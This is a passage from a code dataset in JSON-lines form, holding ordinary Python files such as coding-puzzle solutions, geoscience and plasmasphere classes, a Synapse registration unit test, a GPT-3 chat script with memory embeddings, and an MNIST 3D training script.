wc\n\n\nif __name__ == '__main__':\n print(taumBday(3, 6, 9, 1, 1))\n","repo_name":"gamez-code/hackerrank_problems","sub_path":"taum_bday/taum_bday.py","file_name":"taum_bday.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37535094115","text":"num1 = 64\nnum2 = 16\nvarsum = num1 + num2\nvardifference = num1 - num2\nvarproduct = num1 * num2\nvarquotient = num1 / num2\nprint ('The sum is %s' % (varsum))\nprint ('The difference is %s' % (vardifference))\nprint ('The product is %s' % (varproduct))\nprint ('The quotient is %s' % (varquotient))","repo_name":"mturpin1/CodingProjects","sub_path":"Python/aug29.py","file_name":"aug29.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10710696640","text":"from typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n using array rotation in reversed method\n \"\"\"\n # def reverse(nums):\n # start = 0\n # end = len(nums) - 1\n # while end > start:\n # nums[end], nums[start] = nums[start], nums[end]\n # start += 1\n # end -= 1\n # return nums\n\n # count = 0\n # previous = None\n # for index in range(len(nums)):\n # if nums[index] == 0:\n # count += 1\n # if count == 1:\n # previous = index\n # continue\n\n # tmp = reverse(nums[previous:index])\n # tmp[0:len(tmp)-count+1] = reverse(tmp[0:len(tmp)-count+1])\n # nums[previous:index] = tmp\n # previous = index - count + 1\n # if previous is not None and nums[previous] == 0 and count > 0:\n # tmp = reverse(nums[previous:index+1])\n # tmp[0:len(tmp)-count] = reverse(tmp[0:len(tmp)-count])\n # nums[previous:index+1] = tmp\n \"\"\"\n Try to be fast using two pointer\n \"\"\"\n count = 0\n for index in range(len(nums)):\n value = nums[index]\n if value == 0:\n count += 1\n continue\n if count and value:\n nums[index-count] = value\n index = len(nums) - 1\n for i in range(count):\n nums[index - i] = 0\n\n print(nums)\n\n\nif __name__ == '__main__':\n test = Solution()\n test.moveZeroes([4, 2, 4, 0, 0, 3, 0, 5, 1, 0])\n","repo_name":"Wanghongkua/Leetcode-Python","sub_path":"Archive/283_Move_Zeroes.py","file_name":"283_Move_Zeroes.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28185076519","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Tom van Steijn, Royal HaskoningDHV\n\nfrom collections import namedtuple\nfrom math import exp\nimport re\n\n\nclass LithologyRule(object):\n def test(qc, rf):\n raise NotImplementedError('not implemented in base class')\n\n\nclass ExpLithologyRule(LithologyRule):\n _keys = 'left', 'right', 'a', 'b'\n\n Limit = namedtuple('Limit', _keys)\n def __init__(self, lithology, limits):\n self.lithology = lithology\n self.limits = [self.Limit(**l) for l in limits]\n\n def __repr__(self):\n return ('{s.__class__.__name__:}(lithology={s.lithology:})').format(\n s=self,\n )\n\n def test(self, rf, qc):\n for limit in self.limits:\n if (rf > limit.left) and (rf <= limit.right) and qc!=None:\n return qc > limit.a*exp(limit.b*rf)\n return False\n\nclass LithologyClassifier(object):\n def __init__(self, table, ruletype='exponential'):\n self.default = table['default']\n self.ruletype = ruletype\n\n if ruletype == 'exponential':\n self.rules = [\n ExpLithologyRule(**r) for r in reversed(table['rules'])\n ]\n else:\n raise ValueError('ruletype \\'{}\\' not supported'.format(ruletype))\n\n def __repr__(self):\n return ('{s.__class__.__name__:}(ruletype={s.ruletype:})').format(\n s=self,\n )\n\n def classify(self, rf, qc):\n lithology = self.default\n if not ((rf is None) or (rf < 0.)): # when rf is nodata\n for rule in self.rules:\n if rule.test(rf, qc):\n lithology = rule.lithology\n return lithology\n\n\nclass SandmedianClassifier(object):\n Bin = namedtuple('Bin', ['lower', 'upper', 'medianclass'])\n def __init__(self, bins):\n self.bins = [self.Bin(**b) for b in bins]\n\n def classify(self, median):\n '''get median class using bins'''\n for bin_ in self.bins:\n if (median >= bin_.lower) and (median < bin_.upper):\n return bin_.medianclass\n\n\nclass AdmixClassifier(object):\n def __init__(self, fieldnames):\n self.fieldnames = fieldnames\n\n def classify(self, lithology_admix):\n attrs = {}\n if lithology_admix is None:\n return attrs\n match = re.match('[A-Z]+', lithology_admix)\n if match is not None:\n attrs['lithology'] = match.group(0)\n admixes = re.findall('[a-z]+?\\d?', lithology_admix)\n for admix in admixes:\n key = admix[0].lower()\n admix = admix.upper()\n if len(admix) == 1:\n admix += 'X'\n attrs[self.fieldnames.get(key, key)] = admix.upper()\n return attrs\n\n","repo_name":"tomvansteijn/xsboringen","sub_path":"xsboringen/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"63"} +{"seq_id":"15137860978","text":"def OutputDataSetType():\n\n return \"vtkUnstructuredGrid\"\n\n\ndef Script(time=\"2001-01-01\", coord_sys='GSM', coord_sys_view=None, Resolution=30, version=1):\n\n import vtk\n\n import magnetovis as mvs\n from magnetovis import functions as mvsfunctions\n if version == 1:\n points, cells, logDensity = mvsfunctions.plasmasphere(N=Resolution)\n else:\n points, cells, logDensity = mvsfunctions.plasmasphere2(N=Resolution)\n\n mvs.vtk.set_points(output, points)\n\n mvs.vtk.set_arrays(output, point_data={'H+ log density [cm^-3]': logDensity})\n\n output.Allocate(cells.shape[0], 1)\n for row in range(cells.shape[0]):\n aHexahedron = vtk.vtkHexahedron()\n for col in range(cells.shape[1]):\n aHexahedron.GetPointIds().SetId(col, cells[row, col])\n output.InsertNextCell(aHexahedron.GetCellType(), aHexahedron.GetPointIds())\n\n # The single tranform has the effect of\n # SM -> coord_sys_view (Native coordinate system to view coordinate system)\n # coord_sys_view -> coord_sys (View coordinate system to requested coordinate system)\n mvs._TransformByNames(in_name='SM', out_name=coord_sys, time=time, _output=output, _inputs=[output])\n\n\ndef DefaultRegistrationName(**kwargs):\n\n import magnetovis as mvs\n\n if kwargs['coord_sys'] == \"SM\":\n # Model is in SM and time independent so exclude time.\n return \"{}/{}\".format(\"GCC88 plasmasphere\", kwargs['coord_sys'])\n else:\n # Orientation depends on time, so include it.\n return \"{}/{}/{}\" \\\n .format(\"GCC88 plasmasphere\", mvs.util.trim_iso(kwargs['time']), kwargs['coord_sys'])\n\ndef GetPresentationDefaults():\n\n defaults = {\n 'display': {\n \"Representation\": \"Surface\",\n 'AmbientColor': [0.5, 0.5, 0.5],\n 'DiffuseColor': [0.5, 0.5, 0.5]\n },\n 'coloring': {\n 'colorBy': ('POINTS', 'H+ log density [cm^-3]'),\n 'scalarBar': {\n 'Title': r\"H$^{+}$ log density [cm$^{-3}$]\",\n 'ComponentTitle': '',\n 'HorizontalTitle': 0,\n 'Visibility': 1,\n 'ScalarBarLength': 0.8\n },\n 'colorTransferFunction': {\n 'AutomaticRescaleRangeMode': 1,\n 'AutomaticRescaleRangeMode': \"Grow and update on 'Apply'\",\n 'NumberOfTableValues': 16\n }\n }\n }\n\n return defaults\n\n","repo_name":"rweigel/magnetovis","sub_path":"magnetovis/Sources/Plasmasphere.py","file_name":"Plasmasphere.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7367973600","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 20\n\n@author: jsalsman\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.utils.np_utils import to_categorical\nfrom numpy import asarray\nfrom scipy.stats import rankdata\n\nlines = []\nwith open('featex-tran.txt', 'r') as f: # or, phrase-sliced.txt which has some\n # overlapping words so maybe rename\n # one of them if you want to use the\n # same server for the phrase as for\n # the 82 words\n lines.extend(f.readlines())\n\nX = [] # testing data independents\ny = [] # testing data dependents\nword = '' # word name\nmodel = {}\nn = 0\nlayers = 4\nunits = 32\nepochs = 1000\ndrop = 0.25\nfeatures = None\n\nfor line in lines + ['.']:\n tokens = line.strip().split()\n if line[0] != ' ': # new word\n if word != '': # not the first word\n print (\"word:\", word, n, \"transcripts,\", features, \"features\")\n\n y_cat = to_categorical(y)\n model[word].fit(X, y_cat, epochs=epochs, verbose=0)\n\n # now you can get the probability of intelligibility for some\n # featex vector Z this way:\n # pi = model[word].predict(asarray(Z).reshape(1, -1))[0][1]\n\n if line != '.': # not the last line\n word = tokens[2]\n features = int(tokens[4]) * int(tokens[6]) + int(tokens[8])\n X = []; y = []; n = 0\n\n model[word] = Sequential() # DNN\n model[word].add(Dense(units, input_dim=features,\n activation='softmax',\n kernel_initializer='glorot_uniform'))\n model[word].add(Dropout(drop))\n for i in range(layers):\n model[word].add(Dense(units,\n kernel_initializer='glorot_uniform'))\n model[word].add(Dropout(drop))\n model[word].add(Dense(2, activation='softmax',\n kernel_initializer='glorot_uniform'))\n model[word].compile(optimizer='adam',\n loss='categorical_crossentropy')\n\n else: # read a transcription's word data observation\n if len(tokens) > features + 1: # ignore incomplete recognition results\n fvec = []\n for i in range(features):\n fvec.append(float(tokens[i + 2]))\n if tokens[1] == \"<-\":\n X.append(fvec)\n y.append(float(tokens[0]))\n n += 1\n\n\nbecause_00766t_2 = [0.22, 0.178, 0.929, 0.744, 0.05, 0.200, 0.381, 0.981,\n 0.05, 0.182, 0.548, 0.000, 0.25, 0.161, 0.786, 0.512,\n 0.43, 0.150, 0.929, 0.869, 0.725]\n# unintelligible, pronounced \"cuz\" without the \"bee-\"\n# 0.049262498\n\nbecause_01004t_5 = [0.08, 0.277, 1.000, 0.000, 0.09, 0.275, 0.976, 0.000,\n 0.11, 0.261, 0.952, 0.988, 0.06, 0.198, 0.929, 1.000,\n 0.05, 0.181, 0.333, 0.919, 0.569]\n# intelligible, pronounced \"because-ah\" as in a typical Chinese primary ESL student accent\n# 0.57494467\n\ndef perturb(V, word):\n print(model[word].predict(asarray(V).reshape(1, -1))[0][1])\n phonemes = (len(V) - 1) // 4\n pbs = []\n for n in range(phonemes):\n Z = list(V)\n Z[n*4 + 1] *= 1.5\n Z[n*4 + 2] *= 1.5\n Z[n*4 + 3] *= 1.5\n p_i = model[word].predict(asarray(Z).reshape(1, -1))[0][1]\n print(p_i)\n pbs.append(p_i)\n return [int(i) for i in rankdata(pbs)]\n\nmodel['because'].predict(asarray([because_00766t_2]).reshape(1, -1))[0][1]\n# 0.049262498\n\nmodel['because'].predict(asarray([because_01004t_5]).reshape(1, -1))[0][1]\n# 0.57494467\n\nperturb(because_00766t_2, 'because')\n","repo_name":"jsalsman/featex","sub_path":"example-for-fig3.py","file_name":"example-for-fig3.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"63"} +{"seq_id":"27786009636","text":"from time import perf_counter_ns as ns\n\n\ndef prod(arr):\n p = 1\n for n in arr:\n p *= n\n return p\n\n\ndef brute(arr):\n ans = [prod([n for i, n in enumerate(arr) if i != j]) for j in range(len(arr))]\n return ans\n\n\ndef div(arr): # doesn't work on large arr\n return [prod(arr) / n for n in arr]\n\n\ndef no_div(arr, ans=[]):\n p = 1\n for n in arr[::-1]:\n ans.insert(0, p)\n p *= n\n p = 1\n for i, n in enumerate(arr):\n ans[i] *= p\n p *= n\n return ans\n\n\ntests = [\n [1, 2, 3, 4, 5],\n [3, 2, 1],\n]\n\nf = {'brute': [], 'div': [], 'no_div': []}\nfor n in tests:\n start = ns()\n brute(n)\n end = ns()\n f['brute'].append(end - start)\n start = ns()\n div(n)\n end = ns()\n f['div'].append(end - start)\n start = ns()\n no_div(n)\n end = ns()\n f['no_div'].append(end - start)\nprint(f'brute(): {f[\"brute\"]}, div(): {f[\"div\"]}, no_div(): {f[\"no_div\"]}')\n","repo_name":"e1630m/daily-coding-problem","sub_path":"py/p0002.py","file_name":"p0002.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23954040004","text":"import json\nfrom unittest.mock import Mock\n\nfrom twisted.test.proto_helpers import MemoryReactorClock\n\nfrom synapse.rest.client.register import register_servlets\nfrom synapse.util import Clock\n\nfrom tests import unittest\n\n\nclass TermsTestCase(unittest.HomeserverTestCase):\n servlets = [register_servlets]\n\n def default_config(self):\n config = super().default_config()\n config.update(\n {\n \"public_baseurl\": \"https://example.org/\",\n \"user_consent\": {\n \"version\": \"1.0\",\n \"policy_name\": \"My Cool Privacy Policy\",\n \"template_dir\": \"/\",\n \"require_at_registration\": True,\n },\n }\n )\n return config\n\n def prepare(self, reactor, clock, hs):\n self.clock = MemoryReactorClock()\n self.hs_clock = Clock(self.clock)\n self.url = \"/_matrix/client/r0/register\"\n self.registration_handler = Mock()\n self.auth_handler = Mock()\n self.device_handler = Mock()\n\n def test_ui_auth(self):\n # Do a UI auth request\n request_data = json.dumps({\"username\": \"kermit\", \"password\": \"monkey\"})\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)\n\n self.assertTrue(channel.json_body is not None)\n self.assertIsInstance(channel.json_body[\"session\"], str)\n\n self.assertIsInstance(channel.json_body[\"flows\"], list)\n for flow in channel.json_body[\"flows\"]:\n self.assertIsInstance(flow[\"stages\"], list)\n self.assertTrue(len(flow[\"stages\"]) > 0)\n self.assertTrue(\"m.login.terms\" in flow[\"stages\"])\n\n expected_params = {\n \"m.login.terms\": {\n \"policies\": {\n \"privacy_policy\": {\n \"en\": {\n \"name\": \"My Cool Privacy Policy\",\n \"url\": \"https://example.org/_matrix/consent?v=1.0\",\n },\n \"version\": \"1.0\",\n }\n }\n }\n }\n self.assertIsInstance(channel.json_body[\"params\"], dict)\n self.assertDictContainsSubset(channel.json_body[\"params\"], expected_params)\n\n # We have to complete the dummy auth stage before completing the terms stage\n request_data = json.dumps(\n {\n \"username\": \"kermit\",\n \"password\": \"monkey\",\n \"auth\": {\n \"session\": channel.json_body[\"session\"],\n \"type\": \"m.login.dummy\",\n },\n }\n )\n\n self.registration_handler.check_username = Mock(return_value=True)\n\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n # We don't bother checking that the response is correct - we'll leave that to\n # other tests. We just want to make sure we're on the right path.\n self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)\n\n # Finish the UI auth for terms\n request_data = json.dumps(\n {\n \"username\": \"kermit\",\n \"password\": \"monkey\",\n \"auth\": {\n \"session\": channel.json_body[\"session\"],\n \"type\": \"m.login.terms\",\n },\n }\n )\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n # We're interested in getting a response that looks like a successful\n # registration, not so much that the details are exactly what we want.\n\n self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)\n\n self.assertTrue(channel.json_body is not None)\n self.assertIsInstance(channel.json_body[\"user_id\"], str)\n self.assertIsInstance(channel.json_body[\"access_token\"], str)\n self.assertIsInstance(channel.json_body[\"device_id\"], str)\n","repo_name":"ANSSI-FR/cry-me","sub_path":"cryme_server/src/synapse/sources/tests/test_terms_auth.py","file_name":"test_terms_auth.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"63"} +{"seq_id":"11108152288","text":"SCREEN_WIDTH = 1280\nSCREEN_HEIGHT = 640\nTILE_SIZE = 64\n\nOVERLAY_POSITIONS = {\n \"tool\" : (40, SCREEN_HEIGHT - 15),\n \"seed\" : (70, SCREEN_HEIGHT - 5)}\n\nLAYERS = {\n \"water\" : 0,\n \"ground\" : 1,\n \"soil\" : 2,\n \"soil water\" : 3,\n \"rain floor\" : 4,\n \"house bottom\" : 5,\n \"ground plant\" : 6,\n \"main\" : 7,\n \"house top\" : 8,\n \"fruit\" : 9,\n \"rain drops\" : 10\n}","repo_name":"izumi-0/pydew_valley","sub_path":"code/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"37141851239","text":"import sys\r\nsys.stdin = open(\"input.txt\", \"r\")\r\n\r\nINF = int(1e9)\r\n\r\n\r\ndef bellmanford(start):\r\n dist[start] = 0\r\n for i in range(N):\r\n for j in range(M):\r\n cur, nxt, cost = edges[j]\r\n if dist[cur] != INF and dist[nxt] > dist[cur] + cost:\r\n dist[nxt] = dist[cur] + cost\r\n if i == N-1:\r\n return True\r\n return False\r\n\r\nN, M = map(int, input().split())\r\ndist = [INF for _ in range(N+1)]\r\nedges = []\r\nfor _ in range(M):\r\n a, b, w = map(int, input().split())\r\n edges.append((a, b, w))\r\n\r\nneg_cycle = bellmanford(1)\r\n\r\nif neg_cycle is True:\r\n print(\"-1\")\r\nelse:\r\n for i in range(2, N+1):\r\n if dist[i] == INF:\r\n print(\"-1\")\r\n else:\r\n print(dist[i])\r\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_winter_algorithm_study_basic/WEEK10_BELLMANFORD_AND_FLOYDWASHALL/11657.py","file_name":"11657.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71970577162","text":"import os\nimport re\nimport json\nimport config\nimport openai\nimport numpy as np\nfrom numpy.linalg import norm\nfrom time import time,sleep\nfrom uuid import uuid4\nimport datetime\nopenai.api_key = config.OPENAI_API_KEY\n\ndef open_file(filepath):\n with open(filepath, 'r', encoding='utf-8') as f:\n return f.read()\n\ndef save_file(filepath, content):\n with open(filepath, 'w', encoding='utf-8') as f:\n f.write(content)\n\ndef load_json(filepath):\n with open(filepath, 'r', encoding='utf-8') as f:\n return json.load(f)\n\ndef save_json(filepath, payload):\n with open(filepath, 'w', encoding='utf-8') as f:\n json.dump(payload, f, ensure_ascii=False, sort_keys=True, indent=2)\n\ndef timestamp_to_datetime(unix_time):\n return datetime.datetime.fromtimestamp(unix_time).strftime(\"%A, %B %d, %Y at %I:%M%p %Z\")\n\ndef gpt3_embedding(content, engine='text-embedding-ada-002'):\n content = content.encode(encoding='utf-8', errors='ignore').decode()\n response = openai.Embedding.create(input=content, engine=engine)\n v = response['data'][0]['embedding']\n return v\n\ndef similarity(v1, v2):\n return np.dot(v1, v2) / (norm(v1) * norm(v2))\n\ndef get_memories(vector, logs, count):\n scores = []\n for log in logs:\n if vector == log['vector']:\n continue\n score = similarity(log['vector'], vector)\n log['score'] = score\n scores.append(log)\n ordered = sorted(scores, key=lambda d: d['score'], reverse=True)\n try:\n ordered = ordered[0:count]\n return ordered\n except:\n return ordered\n\ndef load_conversation():\n files = [f for f in os.listdir('conversations') if '.json' in f]\n result = []\n for file in files:\n data = load_json('conversations/%s' % file)\n result.append(data)\n ordered = sorted(result, key=lambda d: d['time'], reverse=False)\n return ordered\n\ndef summarize_memories(memories):\n memories = sorted(memories, key=lambda d: d['time'], reverse=True)\n block = '\\n\\n'.join([mem['message'] for mem in memories])\n identifiers = [mem['uuid'] for mem in memories]\n timestamps = [mem['time'] for mem in memories]\n prompt = open_file('prompt_notes.txt').replace('<>', block)\n notes = gpt3_completion(prompt)\n vector = gpt3_embedding(block)\n info = {'notes': notes, 'uuids': identifiers, 'times': timestamps, 'uuid': str(uuid4()),\n 'vector': vector, 'time': time()}\n filename = 'notes_%s.json' % time()\n save_json('local_notes/%s' % filename, info)\n return notes\n\ndef get_last_messages(conversation, limit):\n try:\n short = conversation[-limit:]\n except:\n short = conversation\n output = ''\n for i in short:\n output += '%s\\n\\n' % i['message']\n output = output.strip()\n return output\n\ndef gpt3_completion(prompt, engine='text-davinci-003', temp=0.0, top_p=1.0,\n tokens=500, freq_pen=0.0, pres_pen=0.0, stop=['USER:', 'JARVIS:']):\n max_retry = 5\n retry = 0\n prompt = prompt.encode(encoding='utf-8', errors='ignore').decode()\n\n while True:\n try:\n response = openai.Completion.create(\n engine=engine,\n prompt=prompt,\n temperature=temp,\n max_tokens=tokens,\n top_p=top_p,\n frequency_penalty=freq_pen,\n presence_penalty=pres_pen,\n stop=stop)\n text = response['choices'][0]['text'].strip()\n text = re.sub('[\\r\\n]+', '\\n', text)\n text = re.sub('[\\t ]+', ' ', text)\n filename = '%s_gpt3.txt' % time()\n save_file('logs/%s' % filename, prompt + '\\n\\n----------\\n\\n' + text)\n return text\n except Exception as fail:\n retry += 1\n if retry >= max_retry:\n return \"GPT-3 error: %s\" % fail\n print('Error communicating with OpenAI:', fail)\n sleep(1)\n\nif __name__ == '__main__':\n while True:\n a = input('\\n\\nUSER: ')\n timestamp = time()\n vector = gpt3_embedding(a)\n timestring = timestamp_to_datetime(timestamp)\n message = '%s: %s - %s' % ('USER', timestring, a)\n info = {'speaker': 'USER', 'time': timestamp, 'vector': vector, 'message': message, 'uuid': str(uuid4()), 'timestring': timestring}\n filename = 'log_%s_USER.json' % timestamp\n save_json('conversations/%s' % filename, info)\n\n conversation = load_conversation()\n memories = get_memories(vector, conversation, 10)\n notes = summarize_memories(memories)\n recent = get_last_messages(conversation, 4)\n\n prompt = open_file('prompt_response.txt').replace('<>', notes).replace('<>', recent)\n output = gpt3_completion(prompt)\n timestamp = time()\n vector = gpt3_embedding(output)\n timestring = timestamp_to_datetime(timestamp)\n message = '%s: %s - %s' % ('JARVIS', timestring, output)\n info = {'speaker': 'JARVIS', 'time': timestamp, 'vector': vector, 'message': message, 'uuid': str(uuid4()), 'timestring': timestring}\n filename = 'log_%s_JARVIS.json' % time()\n save_json('conversations/%s' % filename, info)\n\n print('\\n\\nJARVIS: %s' % output)\n","repo_name":"infoslack/gpt3-jarvis","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"31300244396","text":"import sys\nimport os\nimport shutil\nimport h5py\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils.meters import AverageMeter\nfrom sklearn.model_selection import train_test_split\n\nfrom dataset import MNIST3dDataset, get_dataloaders\nfrom model import MNIST3dModel\n\napex_support = False\ntry:\n sys.path.append('./apex')\n from apex import amp\n apex_support = True\nexcept:\n print(\"Please install apex for mixed precision training from: https://github.com/NVIDIA/apex\")\n apex_support = False\n\ntorch.manual_seed(0)\n\n\ndef _save_config_file(model_checkpoints_folder):\n if not os.path.exists(model_checkpoints_folder):\n os.makedirs(model_checkpoints_folder)\n shutil.copy('./config.yaml', os.path.join(model_checkpoints_folder, 'config.yaml'))\n\n\nclass MNIST3dClassifier(object):\n\n def __init__(self, config):\n self.config = config\n self.device = self._get_device()\n self.writer = SummaryWriter()\n self.writer_val = SummaryWriter(f'{self.writer.log_dir}_val')\n self.train_loss_metric = AverageMeter()\n self.train_acc_metric = AverageMeter()\n self.val_loss_metric = AverageMeter()\n self.val_acc_metric = AverageMeter()\n\n\n def setup_data(self, path):\n with h5py.File(path, 'r') as hf:\n X_train = hf['X_train'][:]\n y_train = hf['y_train'][:]\n \n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.15,\n random_state=1, shuffle=True)\n train_loader = get_dataloaders(X_data=X_train, y_data=y_train,\n batch_size=self.config['batch_size'],\n num_workers=self.config['dataset']['num_workers'])\n val_loader = get_dataloaders(X_data=X_val, y_data=y_val,\n batch_size=self.config['batch_size'],\n num_workers=self.config['dataset']['num_workers'])\n return train_loader, val_loader\n\n\n def _get_device(self):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print(\"Running on:\", device)\n return device\n \n \n def _step(self, model, criterion, data, targets):\n output = model(data)\n targets = targets.view(-1)\n \n loss = criterion(output, targets.type(torch.cuda.LongTensor))\n\n _, predicted = torch.max(output.data, 1)\n\n acc = torch.mean((predicted == targets).type(torch.FloatTensor))\n \n return loss, acc\n \n \n def train(self):\n train_loader, val_loader = self.setup_data(self.config['dataset']['path'])\n\n model = MNIST3dModel(num_classes=self.config['dataset']['num_classes'])\n model.to(self.device)\n model = self._load_pre_trained_weights(model)\n\n learning_rate = 1e-3\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n criterion = torch.nn.CrossEntropyLoss()\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=3)\n\n if apex_support and self.config['fp16_precision']:\n model, optimizer = amp.initialize(model, optimizer,\n opt_level='O2',\n keep_batchnorm_fp32=True)\n\n model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')\n\n # save config file\n _save_config_file(model_checkpoints_folder)\n\n n_iter = 0\n best_valid_loss = np.inf\n\n for epoch_counter in range(1, self.config['epochs'] + 1):\n for data, targets in train_loader:\n optimizer.zero_grad()\n\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n loss, acc = self._step(model, criterion, data, targets)\n\n self.train_loss_metric.update(loss.item())\n self.train_acc_metric.update(acc.item())\n \n if n_iter % self.config['log_every_n_steps'] == 0:\n self.writer.add_scalar('loss',\n self.train_loss_metric.avg,\n global_step=n_iter)\n self.writer.add_scalar('acc',\n self.train_acc_metric.avg,\n global_step=n_iter)\n print('[{}/{}] loss: {:.2f}, acc {:.2f}'.format(epoch_counter,\n self.config['epochs'],\n self.train_loss_metric.avg,\n self.train_acc_metric.avg))\n\n if apex_support and self.config['fp16_precision']:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n\n optimizer.step()\n n_iter += 1\n\n # validate the model if requested\n if epoch_counter % self.config['eval_every_n_epochs'] == 0:\n self.val_loss_metric.reset()\n self.val_acc_metric.reset()\n \n valid_loss, valid_acc = self._validate(model, criterion, val_loader)\n \n if valid_loss < best_valid_loss:\n # save the model weights\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), os.path.join(model_checkpoints_folder, 'model.pth'))\n\n self.writer_val.add_scalar('loss',\n self.val_loss_metric.avg,\n global_step=n_iter)\n self.writer_val.add_scalar('acc',\n self.val_acc_metric.avg,\n global_step=n_iter)\n print('[{}/{}] val_loss: {:.2f}, val_acc {:.2f}'.format(epoch_counter,\n self.config['epochs'],\n self.val_loss_metric.avg,\n self.val_acc_metric.avg))\n\n scheduler.step(valid_loss)\n self.writer.add_scalar('lr_reduce_on_plateau',\n [group['lr'] for group in optimizer.param_groups][0],\n global_step=n_iter)\n\n\n def _validate(self, model, criterion, valid_loader):\n # validation steps\n with torch.no_grad():\n model.eval()\n\n valid_loss = 0.0\n valid_acc = 0.0\n counter = 0\n for data, targets in valid_loader:\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n loss, acc = self._step(model, criterion, data, targets)\n valid_loss += loss.item()\n valid_acc += acc.item()\n self.val_loss_metric.update(loss.item())\n self.val_acc_metric.update(acc.item())\n counter += 1\n valid_loss /= counter\n valid_acc /= counter\n model.train()\n return valid_loss, valid_acc\n\n\n def _load_pre_trained_weights(self, model):\n try:\n checkpoints_folder = os.path.join('./runs', self.config['fine_tune_from'], 'checkpoints')\n state_dict = torch.load(os.path.join(checkpoints_folder, 'model.pth'))\n model.load_state_dict(state_dict)\n print(\"Loaded pre-trained model with success.\")\n except FileNotFoundError:\n print(\"Pre-trained weights not found. Training from scratch.\")\n\n return model\n\n\n def setup_test(self, path):\n with h5py.File(path, 'r') as hf:\n X_test = hf['X_test'][:]\n y_test = hf['y_test'][:]\n test_loader = get_dataloaders(X_data=X_test, y_data=y_test)\n return test_loader\n\n def test(self):\n test_loader = self.setup_test(self.config['dataset']['path'])\n \n model = MNIST3dModel(num_classes=self.config['dataset']['num_classes'])\n model.to(self.device)\n \n model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')\n state_dict = torch.load(os.path.join(model_checkpoints_folder, 'model.pth'))\n model.load_state_dict(state_dict)\n\n criterion = torch.nn.CrossEntropyLoss()\n\n with torch.no_grad():\n model.eval()\n\n test_acc = 0.0\n counter = 0\n for data, targets in test_loader:\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n _, acc = self._step(model, criterion, data, targets)\n test_acc += acc.item()\n counter += 1\n test_acc /= counter\n\n print(f'\\n\\nTest accuracy: {test_acc:.2f}')\n","repo_name":"daptecc/3dmnist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18828078295","text":"import pandas as pd\nimport os\nimport glob\nimport io \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport seaborn as sns\nfrom scipy.stats import zscore\nfrom brainspace.utils.parcellation import reduce_by_labels, map_to_mask\nfrom brainspace.gradient import GradientMaps\nfrom brainspace.datasets import load_parcellation\nfrom brainspace.plotting import plot_hemispheres\nfrom brainspace.utils.parcellation import map_to_labels\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport dill\n\n\n\nlabeling = nib.load(snakemake.params.labels).get_fdata()\n#print(np.shape(labeling[1]))\nmask = ~np.isin(labeling[0],0)\n\nlabeling = labeling.astype(int)\n\n#labeling = np.squeeze(labeling).shape\n#print(np.shape(labeling))\n\n#df = pd.read_table('../participants.tsv')\n#subjects = df.participant_id.to_list() \n#subj = [ s.strip('sub-') for s in subjects ]\n\nsubj = snakemake.params.subjects\n\nnsubjects = len(subj)\n\ndef make_out_dir(out_path):\n\n\t#Make subdirectories to save files\n\tfilename = out_path\n\tif not os.path.exists(os.path.dirname(filename)):\n\t try:\n\t os.makedirs(os.path.dirname(filename))\n\t except OSError as exc: # Guard against race condition\n\t if exc.errno != errno.EEXIST:\n\t raise\n\n#projecting to cortex. Left and Right seperately \ndef 